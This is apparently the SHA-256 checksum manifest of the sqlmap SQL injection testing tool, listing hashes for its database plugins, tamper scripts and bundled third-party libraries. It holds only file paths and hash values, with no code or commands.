plugins/dbms/h2/fingerprint.py +94ee6a0f41bb17b863a0425f95c0dcf90963a7f0ed92f5a2b53659c33b5910b8 plugins/dbms/h2/__init__.py +9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/h2/syntax.py +53951b2ba616262df5a24aa53e83c1e401d7829bd4b7386dd07704fd05811de2 plugins/dbms/h2/takeover.py +f8fe5a55ed20f4f2ab85748b30eb7933359ec2a97a51c9d03335c29451b1589c plugins/dbms/hsqldb/connector.py +f6f4a4912693ea13c037ecfecb991600ca19a0772dab5156fc0c2ad26dff47da plugins/dbms/hsqldb/enumeration.py +85ab36bfa27e3722683b2eb4c49f5afe79a58a3d0bde554d443440e471a48285 plugins/dbms/hsqldb/filesystem.py +1cc469e9129d4ad8a80c0ae8377432d6941bff034b1de2db7c2acf277c4dfdd9 plugins/dbms/hsqldb/fingerprint.py +a05c96907a7e0a13a9f4797351f1d2799e5a39a2c75e6422752dbafd988849ec plugins/dbms/hsqldb/__init__.py +9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/hsqldb/syntax.py +524344f3351b8540025a0859ab25f1ae5c9d8720fb27edd7d33216ae100d6c8c plugins/dbms/hsqldb/takeover.py +978e29639d756547ff94b54a82c27353c1a9a3f593aa17d887642a42447654d4 plugins/dbms/informix/connector.py +f3a71fca5986082d562119b9ca9371776fe84c86463e72abe621413b477d8eca plugins/dbms/informix/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/informix/filesystem.py +0fa903103a82552afee1347ea33c17d4043f8c7b5d3261bba600fd6f7de224dd plugins/dbms/informix/fingerprint.py +3354ff1989eb37845d271b4ce805b87c0e4bf3da3f341ab055ee1ad1c53cb244 plugins/dbms/informix/__init__.py +27b17bf30d941a4c69ee4feceb4f73d65e4fa670cc20583f73902985025407f8 plugins/dbms/informix/syntax.py +874ad3a363f415a9b5b705cb2ec2d76872036ba678bbff5033da6bc1568caff4 plugins/dbms/informix/takeover.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/dbms/__init__.py +1b0a9b61d0a8f785a320145aba3d8e0f27b2c0c26714c2faa1fc206e2044e437 plugins/dbms/maxdb/connector.py +477b9096f899e89670bb0825edba9992ea8489ca474d435a022d11dcf2c87444 plugins/dbms/maxdb/enumeration.py 
+bf0457ede8723646932efa5bef5fea81f25c202731e6562f94688f4aca1e6f07 plugins/dbms/maxdb/filesystem.py +ee89da0d8f5a410009ddc257cde63782724b44dacc623b7592ce8f4da64f0797 plugins/dbms/maxdb/fingerprint.py +586facbacac81503933c2e51819c3c1404090b035efbe7f4fd9ceb15c520e51e plugins/dbms/maxdb/__init__.py +71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/maxdb/syntax.py +7ebb34e4073af1f572c19365b6982a6c172c08fe02c52b97b9a642a7333763b5 plugins/dbms/maxdb/takeover.py +324ee614523fb204d82332f6d332fca3a333fc49c437ca108b7cb96964c1b59e plugins/dbms/mckoi/connector.py +d6049f27ce3243988081b28d6ce09a5dd47addd00ad97f5c3d388956101baba6 plugins/dbms/mckoi/enumeration.py +bd90f82ce5d733e98292f00457e65526c996b5462b43644601f3d1d922407d77 plugins/dbms/mckoi/filesystem.py +8f6a6bc82f5f626838862e255bffca3b8304703054e51f1b373ae0714ad3d58f plugins/dbms/mckoi/fingerprint.py +3fcced127cd0b24a4f5e6cbaa3c7bcf5869c20ecc4720103f83a4fcfe2320f81 plugins/dbms/mckoi/__init__.py +71fe10362af9eb1e479c082c24edb49d97aeaf1469f0edfffe408ed91f6b4f9e plugins/dbms/mckoi/syntax.py +f150ce95097d189d930032d5b2e63b166bcf9e438f725aed90c36e5c393793ec plugins/dbms/mckoi/takeover.py +237615b40daa249a74898cfea05543a200e6ec668076bb9ee57502e1cee2b751 plugins/dbms/mimersql/connector.py +9bc55b72f833a71b978a64def32f9bb949c84cf059e953a7ba7f83755714bee1 plugins/dbms/mimersql/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/mimersql/filesystem.py +8e292bf4b249e2cf2b9dce43e07365a3b0aa7016d094de0491d5e507a2a7c1dc plugins/dbms/mimersql/fingerprint.py +e70a35787a176b388dae2b8124433a11ac60e4b669fd18ebf81665a45233363a plugins/dbms/mimersql/__init__.py +bc7e155bd1cc573fd4144ba98cce34f41bae489208acd3db15d1c36115bf23f8 plugins/dbms/mimersql/syntax.py +2dea7308e4ddd3083c7b2e9db210b7cc00f27f55692b2a65affdf5344e2838df plugins/dbms/mimersql/takeover.py +6e8f5af31a455afdea26c30652a3f112d1627904d263bebfc13849d86d52b5a9 plugins/dbms/monetdb/connector.py 
+74e3dadf825ad4320c612e1ee0340c4af4fb566998cd63c087a5525f6786c55c plugins/dbms/monetdb/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/monetdb/filesystem.py +e60096fe9263392470ba3ca4761b9f2f7768c99b41d2ac688b052ab0fc186f82 plugins/dbms/monetdb/fingerprint.py +bdf70ec72d76a94e60b3a7fefe732184fb85fde5c067a671f7fa4ae80e8cc10c plugins/dbms/monetdb/__init__.py +a1cf9a8cd5e263d1e48dc8b5281febaf868ee91f1e0587dee915949fdb6da1ea plugins/dbms/monetdb/syntax.py +84d9f336ff3d75a1127c7f5ccda7bff6dac947d7d8bbeee2014e8a29b984a98d plugins/dbms/monetdb/takeover.py +545fbbb386ab7819261a3917d0f016d723dbced8e065945ba60271a73544c459 plugins/dbms/mssqlserver/connector.py +2895d14ead30d7ee4e1fdb29a8d1d059493ad60490ed2e9ff6cb9680257554cd plugins/dbms/mssqlserver/enumeration.py +89cbc49cd9113e9ba91be090f79c0384089d1bfed785ac8ee5b07f84309c74cb plugins/dbms/mssqlserver/filesystem.py +87a35cadd3fe4987f548f498c442f748cf1f37650fd1dcd8decd1455a90d675c plugins/dbms/mssqlserver/fingerprint.py +784d6065921a8efbba970864a2cb2e0ef1dd1fcea7181cfc3f737bbfa18f0574 plugins/dbms/mssqlserver/__init__.py +79a887b5a2449bb086805560ff0ec2a2304dd142f47450ae9c2f88cf8bda9ac9 plugins/dbms/mssqlserver/syntax.py +bb0edf756903d8a9df7b60272541768102c64e562e6e7a356c5a761b835efde3 plugins/dbms/mssqlserver/takeover.py +9a1a69416af5a3fc60b93dd8a80fb23b3f190fe96f2564f170df2edeb5bb3599 plugins/dbms/mysql/connector.py +1e29529d6c4938a728a2d42ef4276b46a40bf4309570213cf3c08871a83abdc1 plugins/dbms/mysql/enumeration.py +200b2c910e6902ef8021fe40b3fb426992a016926414cbf9bb74a3630f40842d plugins/dbms/mysql/filesystem.py +b7aa7bf8b1f9ba38597bae7fc8bf436b111eeb5ee6a4ad0a977e56dca88a4afc plugins/dbms/mysql/fingerprint.py +88daad9cf2f62757949cb27128170f33268059e2f0a05d3bd9f75417b99149de plugins/dbms/mysql/__init__.py +20108fe32ae3025036aa02b4702c4eda81db01c04a2e0e2e4494d8f1b1717eca plugins/dbms/mysql/syntax.py +91f34b67fe3ad5bfa6eae5452a007f97f78b7af000457e9d1c75f4d0207f3d39 
plugins/dbms/mysql/takeover.py +125966162396ef4084d70fac1c03e25959a6ccebacd8274bda69b7bebf82b9d5 plugins/dbms/oracle/connector.py +8866391a951e577d2b38b58b970774d38fb09f930fa4f6d27f41af40c06987c1 plugins/dbms/oracle/enumeration.py +5ca9f30cd44d63e2a06528da15643621350d44dc6be784bf134653a20b51efef plugins/dbms/oracle/filesystem.py +b1c939e3728fe4a739de474edb88583b7e16297713147ca2ea64cac8edf2bdf5 plugins/dbms/oracle/fingerprint.py +53fe7fc72776d93be72454110734673939da4c59fecdf17bbbc8de9cdc52c220 plugins/dbms/oracle/__init__.py +39611d712c13e4eb283b65c19de822d5afa4a3c08f12998dd1398725caf48940 plugins/dbms/oracle/syntax.py +cd3590fbb4d500ed2f2434cf218a4198febb933793b7a98e3bb58126839b06f1 plugins/dbms/oracle/takeover.py +9ca6fccb27cac0037103db6f05b561039c9f6bd280ab2fb87b76e4d52142c335 plugins/dbms/postgresql/connector.py +3ebc81646f196624ec004a77656767e4850f2f113b696f7c86b5ca4daf0ee675 plugins/dbms/postgresql/enumeration.py +760285195bdfd91777066bf2751c897f87fab1ada24f729556b122db937c7f88 plugins/dbms/postgresql/filesystem.py +42fbf2707e9f67554571e63ef2d204d28303e4d25eb7781ec800084fb53324ce plugins/dbms/postgresql/fingerprint.py +4c76ebe0369647f95114a7807e08cd0821d3f5b7159a3ec659d33ef8175163f7 plugins/dbms/postgresql/__init__.py +04f8ce5afb10c91cfb456cf4cce627b5351539098c4ddfeb63311a55951ac6b0 plugins/dbms/postgresql/syntax.py +33f5a6676380cdd4dfbe851b5945121399a158a16ad6b6760b931aa140a353e2 plugins/dbms/postgresql/takeover.py +ba4c83075ac870473ca91144641c18bc2ca1bf7d7ef5593e4666d95dc9f659d3 plugins/dbms/presto/connector.py +5b8a46ac204080f1a357dac634330449020d122b4bf84e1c1e9618dc88a8e8a6 plugins/dbms/presto/enumeration.py +3d65033809b919f6ec53ef93f9cdc2b35304014bc261e5c06b26ab52ded9b4c2 plugins/dbms/presto/filesystem.py +cb0eb626dc3467e6adbba46f382f9a370397736312f5b50d39593ce3b84bd01c plugins/dbms/presto/fingerprint.py +90e5500ad15c12394c6bf684d1b85085d6ddad9d2bc2df6ccb2b11be3e21940f plugins/dbms/presto/__init__.py 
+3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/presto/syntax.py +ffd5471d633ecc4bd55ba3674819aec0602ba92812c191d4c1dc468a3263a9f5 plugins/dbms/presto/takeover.py +c122c48253d90a312962dd48ed47847d86df2b199e34133b70ec78d7b385179b plugins/dbms/raima/connector.py +aeeedd464149ad6cfc0dab35b7c7b096a186b4b7ea02641ffa92306d1789f36c plugins/dbms/raima/enumeration.py +3bcd38e900e7c8b53bcbd62dad03f8fa5df04910d96b09115e670302c80b61fc plugins/dbms/raima/filesystem.py +e5b680e2668313a8b3d4567e2394b557a7db407c4f978f63a54c41b8d786d4b1 plugins/dbms/raima/fingerprint.py +48a9d1576247b555ed6d910b047f757dea10242ddeb19c7a69a6183a4724dc27 plugins/dbms/raima/__init__.py +9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/raima/syntax.py +543949cee45ae5cfb36ad38a82666f211d4f8d0ecf224c6ebb13a8d2455441e1 plugins/dbms/raima/takeover.py +3038aa55150688855fb4ea5017fe3405a414f2cf4a7630764b482d02f7442b25 plugins/dbms/sqlite/connector.py +6736ff9995db5675bb82bf2014117bdc5ce641f119b79763edb7aa983443ec87 plugins/dbms/sqlite/enumeration.py +e75cf970d5d76bc364d2fd02eab4086be6263d9c71fa5b44449bada158cd87d3 plugins/dbms/sqlite/filesystem.py +d9a17f49a99b715187e12635a202c5a487e71ef2e6877116d5bc9eb4a0d28eee plugins/dbms/sqlite/fingerprint.py +9b00c84f7b25b488a4cbb45fe9571e6661206771f1968f68badc0c670f042a0b plugins/dbms/sqlite/__init__.py +5457814ccacf9ca75ae6c39f1e615dd1ca63a8a2f21311f549f8a1df02d09634 plugins/dbms/sqlite/syntax.py +3aeb29f4486bd43b34afe58f581cb19a9932cabc87888416d2e383737b690072 plugins/dbms/sqlite/takeover.py +210da495985643e1952edac123f4b0b963545ecb4c10ce7b9421e8ae101d37b7 plugins/dbms/sybase/connector.py +8fbdfd90b980cae6d86d9a4e193644655e0820885bb8d2c847930a1dfa7185d2 plugins/dbms/sybase/enumeration.py +cc237effd49ab53317d8d4b6fad41eef72de7e8f241d9264a65427846ff0c853 plugins/dbms/sybase/filesystem.py +3dabc716f6603b83767c579b9237352b9f4860110f83e47dc6b0d8720c6ca91d plugins/dbms/sybase/fingerprint.py 
+cf21209a5efb9ed2d1c682197f0cd12d514c8c38a7d629f4d66306da8975e300 plugins/dbms/sybase/__init__.py +87c27c7839d6bc4f7bc1dbe44eb7dcca9d2d68ee744f3e2edf6fac3e80f18088 plugins/dbms/sybase/syntax.py +3795dbe49e08fe6a9251ec6ce44e3c323138ffc38dfed93db35220b442faf03b plugins/dbms/sybase/takeover.py +b8adf2e7d9921ff47a4a15f58b4a8665995f5ea079e8843556a11995678a606e plugins/dbms/vertica/connector.py +c6d4c5bf1d6e3420e0b009e44b70f52db4a6d509451188ca9f7c2b0b73608080 plugins/dbms/vertica/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/vertica/filesystem.py +2bc1e4f5b3465e776f377f9ede48de79ed588f74b3cbd12e17868440a4b09c1b plugins/dbms/vertica/fingerprint.py +40a381a9d3a2aeae08321390263d078d1e84212f13b7291ae09fc3b9c91f4cdf plugins/dbms/vertica/__init__.py +e2b7aad0f739b82eef819202d1543983bd461255e3a2ac7bb66849df75728e2a plugins/dbms/vertica/syntax.py +b57d7ae86b5531813aca7ffe11668b8a62ace3e2f8c69dbceca67fbf3cde42ee plugins/dbms/vertica/takeover.py +b17f7ce72b5aa061caf1d0f1fc3510b3a1fa6f382a2d7115ed76dcab271a7507 plugins/dbms/virtuoso/connector.py +a5aa977e1a20b0e8b57cd1369d3071812415904008d533190f00fd13cd26aec9 plugins/dbms/virtuoso/enumeration.py +7148d747b1e76b5c508180dc5a6015f39fdea047d7386784b8dc8a8dad965fd3 plugins/dbms/virtuoso/filesystem.py +01ef324069c3d0a5f50f2916654cdc5c283e59600863820cc55af9d928a55325 plugins/dbms/virtuoso/fingerprint.py +6e355c60fbb131d1190d993732198989f3d17db21cb3b55edaaf586d49cd6807 plugins/dbms/virtuoso/__init__.py +3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/virtuoso/syntax.py +f00e5d1d8ddedcb7980b442d5cabf8bf1c7783c289e32c57a7107f37a3fb40a5 plugins/dbms/virtuoso/takeover.py +25ed1b975dd09a9224056a02e1f7997512da13eb1aa45222cb817928c681f474 plugins/generic/connector.py +b333c73c6a490b5930a09c6c09951af1044eb97076446b2f1475c7cfdfc838a6 plugins/generic/custom.py +4a923f52e8d2dfa6b55c16e08fd5f64eeb292b99573030c0397c7292a4032dd3 plugins/generic/databases.py 
+9b0dbf8f77f190ca92cc58e9c5f784d0b30276ee7d99906f6d9c826c23b6d2e1 plugins/generic/entries.py +783a17bb5188b6b9f4a73dbf10d5cf5c073144d5c1970a9d4aec27cb828e2356 plugins/generic/enumeration.py +5dbcb646c03b43d1f26c0dbd17ae8fb537fdc526ca9984e1cc3e9eae12c38e6e plugins/generic/filesystem.py +ab661b605012168d72f84a92ff7e233542df3825c66714c99073e56acea37e2e plugins/generic/fingerprint.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/generic/__init__.py +9ec577d8ccf4698d4e7834bf1e97aea58fba9d2609714b7139c747bcc4f59a30 plugins/generic/misc.py +546486bd4221729d7d85b6ce3dbc263c818d091c67774bd781d7d72896eb733b plugins/generic/search.py +9be0e2f931b559052518b68511117d6d6e926e69e463ddfa6dc8e9717c0ca677 plugins/generic/syntax.py +7bb6403d83cc9fd880180e3ad36dca0cc8268f05f9d7e6f6dba6d405eea48c3a plugins/generic/takeover.py +115ee30c77698bb041351686a3f191a3aa247adb2e0da9844f1ad048d0e002cd plugins/generic/users.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/__init__.py +baaf7a29a1fe07e7cecc7fb1b1f6a6f327b12154b8d5619e9808b2cf43ad2198 README.md +535ab6ac8b8441a3758cee86df3e68abec8b43eee54e32777967252057915acc sqlmapapi.py +168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62 sqlmapapi.yaml +4121621b1accd6099eed095e9aa48d6db6a4fdfa3bbc5eb569d54c050132cbbf sqlmap.conf +515893a1105f06afb6e91d7a32d89ed350828244f2a4c638d36240b284a61363 sqlmap.py +82caac95182ac5cae02eb7d8a2dc07e71389aeae6b838d3d3f402c9597eb086a tamper/0eunion.py +bc8f5e638578919e4e75a5b01a84b47456bac0fd540e600975a52408a3433460 tamper/apostrophemask.py +c9c3d71f11de0140906d7b4f24fadb9926dc8eaf5adab864f8106275f05526ce tamper/apostrophenullencode.py +fa18d565b7b6b1000942414d65aea762b20632079ed3e1a96fe1005f81fccf07 tamper/appendnullbyte.py +627573bd838cba4c0b688b401ecbc11a15969bd6ded0d2d7e838d622ffe40b99 tamper/base64encode.py +5714dddccd9a94238e58737f8b2ee1a272100037a8360342080f865cc7aa3a4d tamper/between.py 
+e8964badea5a1026da0e67e2b810297e4d2e45c64aee5192d2c5979feae93e69 tamper/binary.py +6dce750c7eb79ddc8743d44233045e7804a4191c9523614e8ee187f1696bb655 tamper/bluecoat.py +4186cf796e0b62c6de81902c33139abd9091725567f49b0f198a1f890f3b9d82 tamper/chardoubleencode.py +71077c3a28ba68d91baa538e08ca3ba55107f607618269261a0dc0858918b236 tamper/charencode.py +60ba0b3d985394a962daa097faa31afb80d5ba93dbd495104a519559386c7350 tamper/charunicodeencode.py +5ec4038bd71c806b903086ad1e099f72c319c7a3b31c4cdf91c97d1fb9d0bdd7 tamper/charunicodeescape.py +9ad1ee5f134e0fa4f3b16b3622e66f212ffd658b099ef75eaaa96d7a63c2fc2e tamper/commalesslimit.py +b28bbe837dc70b935143650d907832038aaec19595a93de96d68131c830e2490 tamper/commalessmid.py +b94713ce6a47d810dd699a480e14e0fd6e6095778d74e5a69e867440ddb1ce66 tamper/commentbeforeparentheses.py +beb5d4129badba301e0cad26652b05af9220921fd99e72c8d5789c2f75c7f171 tamper/concat2concatws.py +cd86b89c63932b7ce204cd80c6d0141ac4bb564b8ea5d1b9eb24a8407431f50f tamper/decentities.py +252a97217f6d3ddd227a1e997cd30f8e0fdc21e235e23307e2bdee96a110c4c6 tamper/dunion.py +853de839258e9137b252fb61429e7353ea9f8b555d050244333836bd99981324 tamper/equaltolike.py +a50b70dd62ee00896c46581d81b1b51bedcec303cb5df2f6c6d98c2817608650 tamper/equaltorlike.py +89803e274257d906e7472a91e60ea0fd0fb4a846eb68dd66b73d298a81a88ee1 tamper/escapequotes.py +e65a98f6b043401fc0b37c821ef9a459e476df33f9dc885756f08c711b4045a1 tamper/greatest.py +a7c656e8a2e09541f435931266c6c9fb20b0cf868f70fb77bff0402e73150a56 tamper/halfversionedmorekeywords.py +af421c0f873e76c2f7182310066d16c7bf14bdda0e79b0eb3cf07be0eca234ed tamper/hex2char.py +4e5d509fb552f92b70f48346df07987ebd7380f92b419d5316b72d07a172b037 tamper/hexentities.py +ae95bef04799cd112e81e8527b88669092996243ce161df85ded36fcda188ae6 tamper/htmlencode.py +fa34e56b7b6578a4611973f273dabac7532672188f2b14a5a68504abb4873d40 tamper/if2case.py +392f14be8826c59cbace4f4ef4e02f3b4c9fa85892aa2c33b8bf9ec8bb67bda5 tamper/ifnull2casewhenisnull.py 
+3a4679f864cffab5f0d0b60a0d0ffdba4adfaba489c07f019d83e0d911dedd1e tamper/ifnull2ifisnull.py +d22f2208649ffc72e2a80f464eacbe35157e1ebebe7889ae9aea3748116a96b7 tamper/informationschemacomment.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 tamper/__init__.py +5fb731d9c0340bd97bc6f647325cf624e7387ae44ce5920ae14c47d007ceb7ea tamper/least.py +a108d0943a17e5e9d3e256ed58a9e1a15327286c6d5a63bf6aad276fb28216ef tamper/lowercase.py +19a1ef76b21931a5e688771a341dc46325129414badc0fbf8c6e35fcce2bd7c0 tamper/luanginxmore.py +f85b74c64441d038198da6b569c050aafd3a0575504c6d0d07d09cdca663692a tamper/luanginx.py +2f1819436c68d2bbb69380508becf8660bddc2cab9349d30c46b0ab727ba7dec tamper/misunion.py +6a2d6cf5d7dc6eb838d0ea8a8e5748db14dd8a415fad0994ab0f05bfe87ed5a5 tamper/modsecurityversioned.py +712a2f7a8f68d16bc77a5e8772098f168207a6815b71a027c2f241655d616102 tamper/modsecurityzeroversioned.py +458fbf5ae865f3b3de237790de1f7045a820d409649a244c8cc2402fa9582c21 tamper/multiplespaces.py +d8e049d1c0b4273bb6cee844767503a60f97301a7041e5c8b51cb0557c413d28 tamper/ord2ascii.py +cf7a99f5a4d6df30b1b8c0df55eb6e950077ec14b31062dd21d2c2d924d58d74 tamper/overlongutf8more.py +381b5fc6fdda0cd287dd6bf2d098c318fab8f42f5ae3ec4e774e864bf57fd51d tamper/overlongutf8.py +965636cef15f4b5d1ce2d802e1be8b51025ee95f96b58ae0131340945e9c7026 tamper/percentage.py +97b6c357c42308fa76d93d271824e53f436fceb33f9a7e74acc8b91da3abb7f4 tamper/plus2concat.py +d49fd12b78fb6f38c4a31c9c7badaf11f65600127783ebb4e941ab0ed2284489 tamper/plus2fnconcat.py +2edf00005991d6546c0ddcab103451ae9425c177bc5519d16b2a78e3e308ec71 tamper/randomcase.py +3259e9189a5d3c2ab476653bc65e45dc481f7541d2688cc8041281ce57205681 tamper/randomcomments.py +8abd8df65c852011a73ffe69febce52f2d383cdb947a70de0ddb2a0f1272e6f6 tamper/schemasplit.py +fc90359a31849c890399f146e5f26edf78f6729cabe022cc49748835a870c16c tamper/scientific.py +387236175825c1651bbf353e7a5553417da9898e60c6e32b302c214ca4ac583f tamper/sleep2getlock.py 
+8de7553f15e7ecee5f0da426829dcd73397889645cb43fc9c47d9e5f122c9524 tamper/space2comment.py +a958305e53d9ca98014918c415d0671e46ca45c6a32762c379e96ab946e75db0 tamper/space2dash.py +3e99a94e0712906558e346b97d3fdad4e9b349b58f7273e6f9340333774eb71a tamper/space2hash.py +f5eb72cc564abba171a881fd8b8335bc19efc8333396575db8f18ce0ca8d1e9f tamper/space2morecomment.py +2b6ec63af32b6a71c5de288e1d507d49513b9690a9c0c79b85e13aba1caabf23 tamper/space2morehash.py +e434ba59a2a68c273a407d99762bf71d08f3b5876efacc9ef1c06d655d5fa7bb tamper/space2mssqlblank.py +0795280f1264b9d2a92ea1017a30c3299fac00403ab35f8110fca173bfdee206 tamper/space2mssqlhash.py +26faeb39842c3770d0f59d871325eb9a59ea29e5f43cfab2872edc7a947a3d73 tamper/space2mysqlblank.py +50365aa886349a268ce39820af2b68d2b119bbfca53e97dbdbadb7296f8f4ce6 tamper/space2mysqldash.py +e5a8d49f6985e27d2d0aebf1227a1d22dea11a4852ccf6ab7fa5e9c84c79a88c tamper/space2plus.py +c8debf71c17719ea4f3c2f07596fcf3f9972f9b4ef70ae25893a1bd5bed8655c tamper/space2randomblank.py +409214cfca98144ce28805ab65ff365189e398e9e9eabb709d1bc00ae7eb36c9 tamper/sp_password.py +de34e24d47e84a0079665ff0253fdafac3d7b1444ae6429735fce1cecaba54c7 tamper/substring2leftright.py +0b50c760a4c08d547a8f86234d9f40bfeb0311d81f342ab08c8a9c0f1cdf2e85 tamper/symboliclogical.py +5a56f752f1276a4f60b442d7e13aa55d58f71dcc0113a1a849831a9b658cab20 tamper/unionalltounion.py +a096122382135668beb66eecf266b77e616695021ee973d0301afe1098fd3ecd tamper/unmagicquotes.py +c48f6dc142fbf062254494e4c41b62852f26095f10d01be85140d5fd836d98d3 tamper/uppercase.py +b88ff93aeb9da9c4c056c6df94e94b798a860ce01846ae2a01962edf9f3ff794 tamper/varnish.py +1219349c2c9fafa21e36dce8bdb5f0be52bd0b6e3d8af6233fe571239543c46b tamper/versionedkeywords.py +6a006674d9e5dba780f6a81897e762b7da36dc259bf3775d392a562574cae7b5 tamper/versionedmorekeywords.py +40c03cf396bc5a090b04f7588b9012ce4de29fc0eceb0ef5e0f7e687d5d11c08 tamper/xforwardedfor.py +55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a 
thirdparty/ansistrm/ansistrm.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py +dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py +7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py +0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py +9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py +0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py +901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py +df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py +e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py +2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py +558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py +3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py +4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py +0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py +924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py +46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py +883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py +fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py +32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py +368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 
thirdparty/chardet/euctwfreq.py +d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py +257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py +806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py +737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py +62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py +be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py +3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py +d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py +2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py +f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py +2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py +4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py +f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py +5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py +4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py +011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py +87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py +498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py +2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py 
+d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py +208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py +a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py +21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py +b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py +1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py +162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py 